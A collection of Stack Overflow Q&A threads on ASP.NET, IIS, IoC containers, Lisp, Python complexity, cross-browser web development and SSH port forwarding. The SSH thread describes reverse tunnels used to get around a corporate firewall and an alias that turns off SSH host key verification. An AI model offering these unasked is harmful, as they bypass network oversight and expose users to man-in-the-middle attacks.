2) ASP.Net won't go above the root folder for the application. Where I'm at we have a rather complex intranet that's still mostly classic ASP, with a smattering of .Net apps here and there as things are updated or new stuff added. It would be nice to be able to keep one copy of common code up fairly high in the folder hierarchy but still have each individual app isolated to it's own VD. But then, that's what source control is for, so it's not a big deal.
For me, the biggest advantage moving from Classic ASP and ASP.Net so far is the IDE. It's so nice to be able to right click on a function call and choose "Go to Definition" rather than having to dig around to find the file where the function is actually implemented. Huge time-saver. And intellisense support and type safety when calling functions is a boon as well.
A: I agree with everyone here except the one who said skip webforms and go straight to MVC. This is not helpful. Webforms is very useful for database-driven applications which do lots of table displays, etc. I have worked on some very large webforms applications and it works fine. MVC is good for more interactive "Web 2.0" type applications.
A: I always use Classic ASP, it works beautifully.
I tried ASP.net for a couple of years but it was too complex for most website development. My customers didn't like it either because they couldn't understand it. They also like knowing they are not locked into one developer.
ASP.NET keeps changing and requires enormous/constant learning curve to keep current. MS switched primary language to C# which made the transition just that much harder.
My productivity slowed to a crawl with .net because I was forever out looking for tutorials or examples of how to do everything.
Visual Studio is pig sloooooow.
PHP has an ugly syntax and too many different frameworks which makes it impossible to learn for developer purposes. Good only for intranet use with dedicated staff, in my opinion.
Classic ASP is locked down and works perfectly today just as it did years ago. With a few library files, code writing is easy as pie and examples are unlimited on the internet.
Written correctly, which most folks don't, vbscript is clean readable, efficient code. I leave the client side stuff for libraries like jQuery and find I am many times more productive.
A: Performance, scalability, and a framework that provides a much better foundation for the stateless world of web applications, for a start.
Wikipedia's ASP.Net page has a section on the differences.
A: For me I'd have to say Classic ASP is quick to develop in, simple to use/pick up, not overly complicated and very capable of most things asked of it.
ASP with JScript/Javascript as the main language is really, really good fun to code with. VBScript is a waste of brain power and I think its that which gives Classic ASP its bad name. Plus its considered slow but all the articles about speed and number of users are based on 10+ year old servers. We run a site getting 60,000 users a day on two servers and the CPU barely flickers. Modern servers give you a lot more power to play with.
With the huge leaps forward in Javascript usage, designs and best practises in recent years the ASP JScript coder can get alot of goodies to make life even easier. I've ported Mootools to server-side and with that we get an load of wonderful helps, class model, excellent event model and so much more. ASP is great fun. UPDATE: Mootools now have a server-side build that you can download (http://mootools.net/download).
ASP.net is SUPER powerful but has a big ramp on the learning curve to do well, can bring your whole site down when it has one of its fits and worst for me can seem to really go around the houses to get the most simplest of things done.
I'm having alot of fun using both at the minute, using which ever one best fits the gap. I've a great little CMS Cacher and Thumbnailer build in .net which my ASP scripts use. Best of both worlds.
A: Having done a "rename asp to aspx and change until it compiles" port of an application to asp.net I would say that even asp classic style programming in .NET is better than asp classic. VS of course will encourage you to fall into the pit of success and drive you towards the web forms and code-behind way of doing things, but the language is expressive enough to replicate the patterns of asp classic (namely lots of golden nuggets/inline code, cross posting pages, etc)
I think I've heard it said before that you can write COBOL in any language. That's true for classic asp.
A: 5 Reasons You Should Take a Closer Look at ASP.NET MVC
A: If you use classic asp at this point (without a mandate from your CTO) then you need to see a shrink. or you are a masochist. Or as satanist, in which case, you'd like it cuz you'd be in hell! :p
On a serious note... for web applications use WebForms.
For light, quick and dirty websites, use ASP.NET MVC.
Good thing about ASP is that you can use VB.NET, C#, Eiffel, Boo or PHP for your language! For PHP check out Phalanger...
A: Since I'm paid to create solutions and not to write code, I just prefer ASP.NET over classic ASP. While classic ASP is still practical for very small, simple sites, there's still a lot of power behind ASP.NET when writing a bit more complex sites. Besides, even with ASP.NET you could still just use Notepad to write the .aspx files yourself, including embedded vb or c# code. Visual Studio just provides a lot of additional functionality that takes away the need to write more code yourself.
And, as I said, I don't get paid for writing code...
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45179",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "53"
} |
Q: Problems with disabling IIS shutdown of idle worker process? I ran into an issue with an IIS web app shutting down an idle worker process! The next request would then have to re-initialize the application, leading to delays.
I disabled the IIS shutdown of idle worker processes on the application pool to resolve this. Are there any issues associated with turning this off? If the process is leaking memory, I imagine it is nice to recycle the process every now and then.
Are there any other benefits to having this process shutdown?
A: I'm assuming that you're referring to IIS 6.
Instead of disabling shutdown altogether, maybe you can just increase the amount of time it waits before killing the process. The server is essentially conserving resources - if your server can stand the resource allocation for a process that mostly sits around doing nothing, then there isn't any harm in letting it be.
As you mentioned, setting the auto-recycling of the process on a memory limit would be a good idea, if the possibility of a memory leak is there.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45180",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "5"
} |
Q: IoC Container Configuration/Registration I absolutely need to use an IoC container for decoupling dependencies in an ever increasingly complex system of enterprise services. The issue I am facing is one related to configuration (a.k.a. registration). We currently have 4 different environments -- development to production and in between. These environments have numerous configurations that slightly vary from environment to environment; however, in all cases that I can currently think of, dependencies between components do not differ from environment to environment, though I could have missed something and/or this could obviously change.
So, the ultimate question is, does anybody have a similar experience using an IoC framework? Or, can anybody recommend one framework over another that would provide flexible registration be it through some sort of convention or simplified configuration information? Would I still be able to benefit from a fluent interface or am I stuck with XML -- I'd like to avoid XML-hell.
Edit: This is a .Net environment and I have been looking at Windsor, Ninject and Autofac. They all seem to now support both methods of registration (fluent and XML), though Autofac's support for lambda expressions seems to be a little different than the others. Anybody use that in a similar multi-deployment environment?
A: If you want to abstract your container, and be able to use different ones, look into having it injectable in a way I tried to do it here
A: I use Ninject. I like the fact that I don't have to use Xml to configure the dependencies. I can just use straight up C# code. There are multiple ways of doing it also. I know other libraries have that feature, but Ninject offers fast instantiation, it is pretty lightweight, it has conditional binding, supports compact framework, and it supports Silverlight, 2.0. I also use a wrapper on top of it, in case I do switch it out for another framework in the future. You should definitely try Ninject when deciding on a framework.
A: I'm not sure whether it will suit your particular case, you didn't mention what platform you're working in, but I've had great success with Castle Windsor's IOC framework. The dependencies are setup in the config file (it's a .NET framework)
A: Look at Ayendes rhino commons. He uses an abstraction over the IoC container. So that you can switch containers whenever you want. Something like container.Resolve is always there in every container.
I use Structuremap to do the dirty work it has a fluent interface and the XML things and it is powerfull enough for most things you want to do. Each one has it's own pros and cons so a little abstraction so you can easily switch (you never know how long they are going to be around) is good. For the rest I think Spring.Net, Castle windsor, Ninject and StructureMap aren't that far apart anymore.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45202",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "1"
} |
Q: How do I force unix (LF) line endings in Visual Studio (Express) 2008? Is there a way to always have LF line endings in Visual Studio? I can never seem to find it!
A: There'a an add-in for Visual Studio 2008 that converts the end of line format when a file is saved. You can download it here: http://grebulon.com/software/stripem.php
A: You don't have to install any plugins.
As mentioned here you can configure line endings in File -> Advanced Save options...
A: Yes, there is a way to always have LF line endings, at least in Visual Studio 2010 Pro.
Go to Tools | Options... | Environment | Documents
Then Enable the Check for consistent line endings on load option.
It works for me.
A: Visual Studio 2008 doesn't retain the advanced save options after the solution is closed. I would be willing to hand edit a lot of files if that would make it work consistently, but I am not willing to change all of the settings every time I open VS.
This is too bad. Since VS does support forcing the line-endings to whatever is desired in the backend, its just not hooked up properly in the UI. Maybe Microsoft will fix this isn a service pack.
A: There's a plugin to VS called Strip'Em where you can choose which kind of new line type you want to auto convert all the line endings to when saving.
(You can choose between LF, CRLF, CR.)
A: I seem to have found a method by accident and found this article attempting to correct it (I want Windows CRLF EOL)! Doing the following results in UNIX (LF only) line endings for me.
SaveFileDialog^ dialog = gcnew SaveFileDialog();
System::Windows::Forms::DialogResult DR;
dialog->Filter = "txt files (*.txt)|*.txt|All files (*.*)|*.*";
dialog->FilterIndex = 2;
dialog->RestoreDirectory = true;
dialog->DefaultExt = "txt";
DR = dialog->ShowDialog(this);
if ( DR == System::Windows::Forms::DialogResult::OK )
{
// Get the page (tab) we are currently on
System::Windows::Forms::TabPage ^selPage = this->tabControl1->SelectedTab;
// Note: technically the correct way to look for our control is to use Find and search by name
// System::Windows::Forms::RichTextBox ^selText = selPage->Controls->Find("rtb", false);
// I only add one control (rich text) so first control ([0]) must be it
System::Windows::Forms::RichTextBox ^selText = safe_cast<System::Windows::Forms::RichTextBox^>(selPage->Controls[0]);
// Just let a Windows forms method do all the work
File::WriteAllText(dialog->FileName, selText->Text);
}
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45207",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "67"
} |
Q: List operations in Lisp I have been searching everywhere for the following functionality in Lisp, and have gotten nowhere:
*
*find the index of something in a list. example:
(index-of item InThisList)
*replace something at a specific spot in a list. example:
(replace item InThisList AtThisIndex) ;i think this can be done with 'setf'?
*return an item at a specific index. example:
(return InThisList ItemAtThisIndex)
Up until this point, I've been faking it with my own functions. I'm wondering if I'm just creating more work for myself.
This is how I've been faking number 1:
(defun my-index (findMe mylist)
(let ((counter 0) (found 1))
(dolist (item mylist)
(cond
((eq item findMe) ;this works because 'eq' checks place in memory,
;and as long as 'findMe' was from the original list, this will work.
(setq found nil)
(found (incf counter))))
counter))
A: Answers:
*
*(position item sequence &key from-end (start 0) end key test test-not)
http://lispdoc.com/?q=position&search=Basic+search
*(setf (elt sequence index) value)
*(elt sequence index)
http://lispdoc.com/?q=elt&search=Basic+search
NOTE: elt is preferable to nth because elt works on any sequence, not just lists
A: Jeremy's answers should work; but that said, if you find yourself writing code like
(setf (nth i my-list) new-elt)
you're probably using the wrong datastructure. Lists are simply linked lists, so they're O(N) to access by index. You might be better off using arrays.
Or maybe you're using lists as tuples. In that case, they should be fine. But you probably want to name accessors so someone reading your code doesn't have to remember what "nth 4" is supposed to mean. Something like
(defun my-attr (list)
(nth 4 list))
(defun (setf my-attr) (new list)
(setf (nth 4 list) new))
A: +2 for "Practical Common Lisp". It is a mixture of a Common Lisp Cookbook and a quality Teach Yourself Lisp book.
There's also "Successful Common Lisp" (http://www.psg.com/~dlamkins/sl/cover.html and http://www.psg.com/~dlamkins/sl/contents.html) which seemed to fill a few gaps / extend things in "Practical Common Lisp".
I've also read Paul Graham's "ANSI Common Lisp" which is more about the basics of the language, but a bit more of a reference manual.
A: You can use setf and nth to replace and retrieve values by index.
(let ((myList '(1 2 3 4 5 6)))
(setf (nth 4 myList) 101); <----
myList)
(1 2 3 4 101 6)
To find by index you can use the position function.
(let ((myList '(1 2 3 4 5 6)))
(setf (nth 4 myList) 101)
(list myList (position 101 myList)))
((1 2 3 4 101 6) 4)
I found these all in this index of functions.
A:
*
*find the index of something in a list.
In Emacs Lisp and Common Lisp, you have the position function:
> (setq numbers (list 1 2 3 4))
(1 2 3 4)
> (position 3 numbers)
2
In Scheme, here's a tail recursive implementation from DrScheme's doc:
(define list-position
(lambda (o l)
(let loop ((i 0) (l l))
(if (null? l) #f
(if (eqv? (car l) o) i
(loop (+ i 1) (cdr l)))))))
----------------------------------------------------
> (define numbers (list 1 2 3 4))
> (list-position 3 numbers)
2
>
But if you're using a list as a collection of slots to store structured data, maybe you should have a look at defstruct or even some kind of Lisp Object System like CLOS.
If you're learning Lisp, make sure you have a look at Practical Common Lisp and / or The Little Schemer.
Cheers!
A: I have to agree with Thomas. If you use lists like arrays then that's just going to be slow (and possibly awkward). So you should either use arrays or stick with the functions you've written but move them "up" in a way so that you can easily replace the slow lists with arrays later.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45227",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "7"
} |
Q: Where can I find the time and space complexity of the built-in sequence types in Python I've been unable to find a source for this information, short of looking through the Python source code myself to determine how the objects work. Does anyone know where I could find this online?
A: If your asking what I think your asking, you can find them Here... page 476 and on.
It's written around optimization techniques for Python; It's mostly Big-O notation of time efficiencies not much memory.
A: Checkout the TimeComplexity page on the py dot org wiki. It covers set/dicts/lists/etc at least as far as time complexity goes.
A: Raymond D. Hettinger does an excellent talk (slides) about Python's built-in collections called 'Core Python Containers - Under the Hood'. The version I saw focussed mainly on set and dict, but list was covered too.
There are also some photos of the pertinent slides from EuroPython in a blog.
Here is a summary of my notes on list:
*
*Stores items as an array of pointers. Subscript costs O(1) time. Append costs amortized O(1) time. Insert costs O(n) time.
*Tries to avoid memcpy when growing by over-allocating. Many small lists will waste a lot of space, but large lists never waste more than about 12.5% to overallocation.
*Some operations pre-size. Examples given were range(n), map(), list(), [None] * n, and slicing.
*When shrinking, the array is realloced only when it is wasting 50% of space. pop is cheap.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45228",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "19"
} |
Q: Is it possible to forward ssh requests that come in over a certain port to another machine? I have a small local network. Only one of the machines is available to the outside world (this is not easily changeable). I'd like to be able to set it up such that ssh requests that don't come in on the standard port go to another machine. Is this possible? If so, how?
Oh and all of these machines are running either Ubuntu or OS X.
A: @Mark Biek
I was going to say that, but you beat me to it! Anyways, I just wanted to add that there is also the -R option:
ssh -R 8022:myinsideserver:22 paul@myoutsideserver
The difference is what machine you are connecting to/from. My boss showed me this trick not too long ago, and it is definitely really nice to know... we were behind a firewall and needed to give external access to a machine... he got around it by ssh -R to another machine that was accessible... then connections to that machine were forwarded into the machine behind the firewall, so you need to use -R or -L based on which machine you are on and which you are ssh-ing to.
Also, I'm pretty sure you are fine to use a regular user as long as the port you are forwarding (in this case the 8022 port) is not below the restricted range (which I think is 1024, but I could be mistaken), because those are the "reserved" ports. It doesn't matter that you are forwarding it to a "restricted" port because that port is not being opened (the machine is just having traffic sent to it through the tunnel, it has no knowledge of the tunnel), the 8022 port IS being open and so is restricted as such.
EDIT: Just remember, the tunnel is only open so long as the initial ssh remains open, so if it times out or you exit it, the tunnel will be closed.
A: (In this example, I am assuming port 2222 will go to your internal host. $externalip and $internalip are the ip addresses or hostnames of the visible and internal machine, respectively.)
You have a couple of options, depending on how permanent you want the proxying to be:
*
*Some sort of TCP proxy. On Linux, the basic idea is that before the incoming packet is processed, you want to change its destination—i.e. prerouting destination NAT:
iptables -t nat -A PREROUTING -p tcp -i eth0 -d $externalip --dport 2222 --sport
1024:65535 -j DNAT --to $internalip:22
*Using SSH to establish temporary port forwarding. From here, you have two options again:
*
*Transparent proxy, where the client thinks that your visible host (on port 2222) is just a normal SSH server and doesn't realize that it is passing through. While you lose some fine-grained control, you get convenience (especially if you want to use SSH to forward VNC or X11 all the way to the inner host).
*
*From the internal machine: ssh -g -R 2222:localhost:22 $externalip
*Then from the outside world: ssh -p 2222 $externalip
Notice that the "internal" and "external" machines do not have to be on the same LAN. You can port forward all the way around the world this way.
*Forcing login to the external machine first. This is true "forwarding," not "proxying"; but the basic idea is this: You force people to log in to the external machine (so you control on who can log in and when, and you get logs of the activity), and from there they can SSH through to the inside. It sounds like a chore, but if you set up simple shell scripts on the external machine with the names of your internal hosts, coupled with password-less SSH keypairs then it is very straightforward for a user to log in. So:
*
*On the external machine, you make a simple script, /usr/local/bin/internalhost which simply runs ssh $internalip
*From the outside world, users do: ssh $externalip internalhost and once they log in to the first machine, they are immediately forwarded through to the internal one.
Another advantage to this approach is that people don't get key management problems, since running two SSH services on one IP address will make the SSH client angry.
FYI, if you want to SSH to a server and you do not want to worry about keys, do this
ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no
I have an alias in my shell called "nossh", so I can just do nossh somehost and it will ignore all key errors. Just understand that you are ignoring security information when you do this, so there is a theoretical risk.
Much of this information is from a talk I gave at Barcamp Bangkok all about fancy SSH tricks. You can see my slides, but I recommend the text version as the S5 slides are kind of buggy. Check out the section called "Forward Anything: Simple Port Forwarding" for info. There is also information on creating a SOCKS5 proxy with OpenSSH. Yes, you can do that. OpenSSH is awesome like that.
(Finally, if you are doing a lot of traversing into the internal network, consider setting up a VPN. It sounds scary, but OpenVPN is quite simple and runs on all OSes. I would say it's overkill just for SSH; but once you start port-forwarding through your port-forwards to get VNC, HTTP, or other stuff happening; or if you have lots of internal hosts to worry about, it can be simpler and more maintainable.)
A: Another way to go would be to use ssh tunneling (which happens on the client side).
You'd do an ssh command like this:
ssh -L 8022:myinsideserver:22 paul@myoutsideserver
That connects you to the machine that's accessible from the outside (myoutsideserver) and creates a tunnel through that ssh connection to port 22 (the standard ssh port) on the server that's only accessible from the inside.
Then you'd do another ssh command like this (leaving the first one still connected):
ssh -p 8022 paul@localhost
That connection to port 8022 on your localhost will then get tunneled through the first ssh connection taking you over myinsideserver.
There may be something you have to do on myoutsideserver to allow forwarding of the ssh port. I'm double-checking that now.
Edit
Hmmm. The ssh manpage says this: **Only the superuser can forward privileged ports. **
That sort of implies to me that the first ssh connection has to be as root. Maybe somebody else can clarify that.
It looks like superuser privileges aren't required as long as the forwarded port (in this case, 8022) isn't a privileged port (like 22). Thanks for the clarification Mike Stone.
A: You can use Port Fowarding to do this. Take a look here:
http://portforward.com/help/portforwarding.htm
There are instructions on how to set up your router to port forward request on this page:
http://www.portforward.com/english/routers/port_forwarding/routerindex.htm
A: In Ubuntu, you can install Firestarter and then use it's Forward Service feature to forward the SSH traffic from a non standard port on your machine with external access to port 22 on the machine inside your network.
On OS X you can edit the /etc/nat/natd.plist file to enable port fowarding.
A: Without messing around with firewall rules, you can set up a ~/.ssh/config file.
Assume 10.1.1.1 is the 'gateway' system and 10.1.1.2 is the 'client' system.
Host gateway
Hostname 10.1.1.1
LocalForward 8022 10.1.1.2:22
Host client
Hostname localhost
Port 8022
You can open an ssh connection to 'gateway' via:
ssh gateway
In another terminal, open a connection to the client.
ssh client
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45230",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "6"
} |
Q: Strange Dependency Behavior in VS.NET 2005 (Unnecessary .CPP Compilation) I work on a large Visual C++ (MFC) project in VS.NET 2005.
I have noticed strange behavior in Visual C++ 2005. Often, I will change one line of code in a .CPP file but many .CPP files will compile as a result of this. I have never seen this until VS.NET 2005. Theortically, changing a line of code in a .CPP file should simply require recompilation of that .CPP file and re-linking of the PE file.
What am I not understanding about the build process.
A: I found this link helpful when solving a similar problem, was under pressure at the time, I tried a few things and the issue went away, for the life of me I don't know (or can't remember) which - if any - helped.
Hope this helps
A: This is a strange bug in the VS2005 dependency behavior. To find out one suggestion would be to take the following steps:
*
*Go to Tools -> Options ->
Projects and Solutions -> Build and
Run -> MSBuild Project Build output
Verbosity and select Detailed
*Compile your project.
This will give you a detailed output of the build which "may" help you arrive at a solution to your problem.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45235",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "1"
} |
Q: What is the best technique for consistent form, function between all web browsers (including Google Chrome)? Short version: What is the cleanest and most maintainable technique for consistant presentation and AJAX function across all browsers used by both web developers and web developers' end-users?
*
*IE 6, 7, 8
*Firefox 2, 3
*Safari
*Google Chrome
*Opera
Long version: I wrote a web app aimed at other web developers. I want my app to support the major web browsers (plus Google Chrome) in both presentation and AJAX behavior.
I began on Firefox/Firebug, then added conditional comments for a consistent styling under IE 6 and 7. Next, to my amazement, I discovered that jQuery does not behave identically in IE; so I changed my Javascript to be portable on FF and IE using conditionals and less pure jQuery.
Today, I started testing on Webkit and Google Chrome and discovered that, not only are the styles inconsistant with both FF and IE, but Javascript is not executing at all, probably due to a syntax or parse error. I expected some CSS work, but now I have more Javascript debugging to do! At this point, I want to step back and think before writing piles of special cases for all situations.
I am not looking for a silver bullet, just best practices to keep things as understandable and maintainable as possible. I prefer if this works with no server-side intelligence; however if there is a advantage to, for example, check the user-agent and then return different files to different browsers, that is fine if the total comprehensibility and maintainability of the web app is lower. Thank you all very much!
A: Chrome is actually a little different to Safari, it uses a completely different javascript implementation and problems have been reported with both prototype and jquery. I wouldn't worry about it too much for now, it's still an early beta version of the browser and such inconsistencies will probably be treated as bugs. Here's the bug report.
A: One "silver bullet" you may consider turning to is Google Web Toolkit (GWT).
I believe it supports all the browsers you are interested in, and gives you the ability to code your UI in a Java-compatible IDE such as Eclipse. The advantage of this is you can use IDE tools for code completion and compile-time error checking, which greatly improves development on large-scale UI projects.
If you use GWT UI components, it will hide a lot of browser-specific nastiness from having to be dealt with, but when you compile, will create a compact, deploy file for each browser platform. This way you never download any IE-specific code if you are viewing the app in Firefox. You will also have a client-side stub generated which will load the appropriate compiled bundle of JS. To sweeten the deal, these files are cacheable, so perceived performance is generally improved for returning visitors.
A: The landscape has evolved considerably to accommodate cross-browser development. jQuery, Prototype and other frameworks exist for cross-browser Javascript. CSS resets are good for starting on a common blank canvas for all browsers. BluePrint and 960 are both CSS frameworks to help with layouts using CSS grid layouts techniques that seems to be getting very popular these days.
As for other CSS quirks across the different browsers, there is no holy grail here and the only option is to test you website across different browsers and use this awesome resource and definitely join a mailing list to save up soem time.
If you are working on high volume production site then you can use a service like browsercam.com in the end game to ensure the site doesn't break horribly in some browser.
Lastly, don't try to make the site look the same in every browser. Your primary design should target IE/FF and you should be okay with reasonable compromises on others. Use the graded browser chart to narrow in on browser support.
As for best practices, starting using wireframes on blank paper or a service like Balsamiq mockups. I am still surprised how many developers start with an editor instead of a wireframe but then again I only switched a year back before realizing how big a time saver it is. Have clean seperation of layout (HTML), presentation (CSS) and behaviors (Javascript). There should be no styling elements in HTML, no presenation in Javascript (use .addClass('highlight') instead of .css({'background-color': 'red'});).
If you are not familiar with any of the bold terms in this post, Googling them should be fruitful for your web development career and productivity.
A: If you're starting from a base reset or framework and have accounted for IE and it's still all freaky, you may want to recheck the following:
*
*Everything validates? CSS and HTML?
*Any broken links to an included file (js, css, etc?). In Chrome/Safari, if your stylesheet link is busted, all of your links might end up red. (something to do with the default 404 styling I think)
*Any odd requirements of your js plugins that you might be using? (does the css file have to come before the js file, like with jquery.thickbox?)
A: For UI, check out Ext.
It's great as a standalone library, though it can also be used with jQuery, YUI, Prototype and GWT.
Samples: http://extjs.com/deploy/dev/examples/samples.html
A: I've found four things helpful in developing JavaScript applications:
*
*Feature detection
*Libraries
*Iterative Development using Virtualization
*JavaScript: The Definitive Guide, Douglas Crockford & John Resig
Feature Detection
Use reflection to ask if the browser supports the desired feature. If you want to know what event handling a browser supports, you can if(el.addEventHandler) for W3C compliance, if(el.attachEvent) for the IE-type, and finally fall back on el.['onSomeEvent'].
ONE BIG BUT!
Browsers sometimes lie about what features they support. I can't remember, but I ran into an issues where Firefox implemented a DOM feature, but would return false if you tested for that feature!
Libraries
Since you're already working with jQuery, I'll save the explanation. But if you're running into problems you may want to consider YUI for it's wonderful cross-browser compatibility. They even work together.
Iterative Development with Virtualization
Perhaps my best advice: Run all your test environment's at once. Get a Linux distro, Compiz Fusion and a bunch of RAM. Download a copy of either VMWare's VMWare Server or Sun's Virtual Box and install a few operating systems. Get images for Windows XP, Windows Vista and Mac OS X.
The basic idea is this: Compiz Fusion gives you 4 Desktops mapped onto a Cube. 1 of these desktops is your Linux computer, the next your Virtutual Windows XP box, the one after that Vista, the last Mac OS X. After writing some code, you alt-tab into virtual computer and check out your work. Plus it looks awesome.
JavaScript: The Definitive Guide, Douglas Crockford & John Resig
These three sources provide most of my information for JavaScript development. The Definitive guide is perhaps the best reference book for JavaScript.
Douglas Crockford is a JavaScript guru (I hate the word) at Yahoo. Lookup his series "Douglas Crockford Theory of the DOM", "Douglas Crockford Advanced JavaScript", "Douglas Crockford Theory of the Dom", and ""Douglas Crockford The Good Parts" on Yahoo! Videos.
John Resig (as you know) wrote jQuery. His website at ejohn.org contains a wealth of JavaScript information, and if you dig around on Google you'll find he's given a number of presentations on defensive JavaScript techniques.
... Good luck!
A: I am in a similar situation, working on a web app that is targeted at IT professionals, and required to support the same set of browsers, minus Opera.
Some general things I've learned so far:
*
*Test often, in as many of your target browsers as you can. Make sure you have time for this in your development schedule.
*Toolkits can get you part of the way to cross-browser support, but will eventually miss something on some browser. Plan some time for debugging and researching fixes for specific browsers.
*If you need something that's not in a toolkit and can't find a free code snippet, invest some time to write utility functions that encapsulate the browser-dependent behavior.
*Educate yourself about known browser bugs, so that you can steer your implementation around them.
A few more-specific things I've learned:
*
*Use conditional code based on the user-agent only as a last resort, because different generations of the "same" browser may have different features. Instead, test for standards-compliant behavior first — e.g., if(node.addEventListener)..., then common non-standard functions — e.g., if(window.attachEvent)..., and then, if you must, look at the user-agent for a specific browser type & version number.
*Knowing when the DOM is 'ready' for script access is different in just about every browser. A good toolkit will abstract this for you.
*Event handlers are different in just about every browser. A good toolkit will abstract this for you.
*Creating DOM elements, particularly form controls or elements with attributes, can be tricky with document.createElement and element.setAttribute. While not standard (and kinda yucky), using node.innerHTML with strings that contain bits of HTML seems to be more reliable across browser types. I have yet to find a toolkit that will let you use element.setAttribute to add a 'name' to a form element in IE.
*CSS differences (and bugs) are just as important as JS differences.
*The 'core' Javascript features (String, Date, RegExp, Array functions) seem to be pretty reliable and consistent across browsers, especially relative to the DOM/CSS/Window functions. There's some small joy in the fact that the language isn't entirely different on every platform. :-)
I haven't really run into any Chrome-specific JS bugs, but it's always one of the first browsers I test.
HTH
A: Just so you've got one less browser to worry about, Chrome uses the same rendering engine as Safari. So if it works in Safari, it should work exactly the same in Chrome.
See this post on Matt Cutts' blog.
Google Chrome uses WebKit for rendering, which is the same rendering engine as Apple’s Safari browser, so if your site is compatible with Safari it should work great in Chrome.
Update: Looks like this is now out-dated info. Please see Vox's comment on this answer.
A: If your very top priority is exactly consistent presentation on all the browsers listed with no disparities, you should probably be looking at AS3 and Flex.
A: Personally, I use Mootools as a simple lightweight javascript framework. It is simple to use and supports all the browsers above (except Chrome, but that seems to work too as far as I can tell).
Also, to ensure consistency across the browsers, I get a feature/style/behaviour/etc. to work in one browser first (usually Firefox 3 with firebug), then immediately check to make sure it works in all the other browsers (leaving IE6 for last). If it doesn't, I inveset the time to fix it right away, because otherwise I know I won't have time later (in my experience, getting things to work cross-browser takes about 50% of my dev. time ;-) )
A: Validating your javascript with a "good parts" + browser on JsLint.com makes it less likely to have JavaScripts behaving differently in FF, Safari etc.
Otherwise - using standards and validating your code as well as building on existing techniques like jQuery should make your site behave the same in all browsers except IE - and there's no magic recipe for IE - it's just bugs everywhere...
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45239",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "10"
} |
Q: Load Balancing of Process in 1 Server I have 1 process that receives incoming connection from port 1000 in 1 linux server. However, 1 process is not fast enough to handle all the incoming request.
I want to run multiple processes in the server but with 1 end-point. In this way, the client will only see 1 end-point/process not multiple.
I have checked LVS and other Load Balancing Solution. Those solutions seem geared towards multiple servers load-balancing.
Any other solution to help on my case?
i am looking something more like nginx where i will need to run multiple copies of my app.
Let me try it out.
Thanks for the help.
A: The question is a little unclear to me, but I suspect the answer you are looking for is to have a single process accepting tasks from the network, and then forking off 'worker processes' to actually perform the work (before returning the result to the user).
In that way, the work which is being done does not block the acceptance of more requests.
As you point out, the term load balancing carries the implication of multiple servers - what you want to look for is information about how to write a linux network daemon.
The two kes system calls you'll want to look at are called fork and exec.
A: It sounds like you just need to integrate your server with xinetd.
This is a server that listens on predefined ports (that you control through config) and forks off processes to handle the actual communication on that port.
A: You also may want to go with a web server like nginx. It can load balance your app against multiple ports of the same app, and is commonly used to load balance Ruby on Rails apps (which are single threaded). The downside is that you need to run multiple copies of your app (one on each port) for this load balancing to work.
A: You need multi-processing or multi-threading. You aren't specific on the details of the server, so I can't give you advice on what to do exactly. fork and exec as Matt suggested can be a solution, but really: what kind of protocol/server are we talking about?
A: i am thinking to run multiple application similar to ypops.
A: nginx is great but if you don't fancy a whole new web server, apache 2.2 with mod proxy balancer will do the same job
A: Perhaps you can modify your client to round-robin ports (say) 1000-1009 and run 10 copies of the process?
Alternatively there must be some way of internally refactoring it.
It's possible for several processes to listen to the same socket at once by having it opened before calling fork(), but (if it's a TCP socket) once accept() is called the resulting socket then belongs to whichever process successfully accepted the connection.
So essentially you could use:
*
*Prefork, where you open the socket, fork a specified number of children which then share the load
*Post-fork, where you have one master process which accepts all the connections and forks children to handle individual sockets
*Threads - you can share the sockets in whatever way you like with those, as the file descriptors are not cloned, they're just available to any thread.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45252",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "1"
} |
Q: Adding functionality to Rails I'm working on a Rails app and am looking to include some functionality from "Getting the Hostname or IP in Ruby on Rails" that I asked.
I'm having problems getting it to work. I was under the impression that I should just make a file in the lib directory, so I named it 'get_ip.rb', with the contents:
require 'socket'
module GetIP
def local_ip
orig, Socket.do_not_reverse_lookup = Socket.do_not_reverse_lookup, true # turn off reverse DNS resolution temporarily
UDPSocket.open do |s|
s.connect '64.233.187.99', 1
s.addr.last
end
ensure
Socket.do_not_reverse_lookup = orig
end
end
I had also tried defining GetIP as a class but when I do the usual ruby script/console, I'm not able to use the local_ip method at all. Any ideas?
A: require will load a file. If that file contains any class/module definitions, then your other code will now be able to use them. If the file just contains code which is not in any modules, it will get run as if it were in the same place as your 'require' call (like PHP include)
include is to do with modules.
It takes all the methods in the module, and adds them to your class. Like this:
class Orig
end
Orig.new.first_method # no such method
module MyModule
def first_method
end
end
class Orig
include MyModule
end
Orig.new.first_method # will now run first_method as it's been added.
There's also extend which works like include does, but instead of adding the methods as instance methods, adds them as class methods, like this:
Note above, how when I wanted to access first_method, I created a new object of Orig class. That's what I mean by instance method.
class SecondClass
extend MyModule
end
SecondClass.first_method # will call first_method
Note that in this example I'm not making any new objects, just calling the method directly on the class, as if it had been defined as self.first_method all along.
So there you go :-)
A: You haven't described how you're trying to use the method, so I apologize in advance if this is stuff you already know.
The methods on a module never come into use unless the module is included into a class. Instance methods on a class require there to be an instance of the class. You probably want a class method instead. And the file itself should be loaded, generally through the require statement.
If the following code is in the file getip.rb,
require 'socket'
class GetIP
def self.local_ip
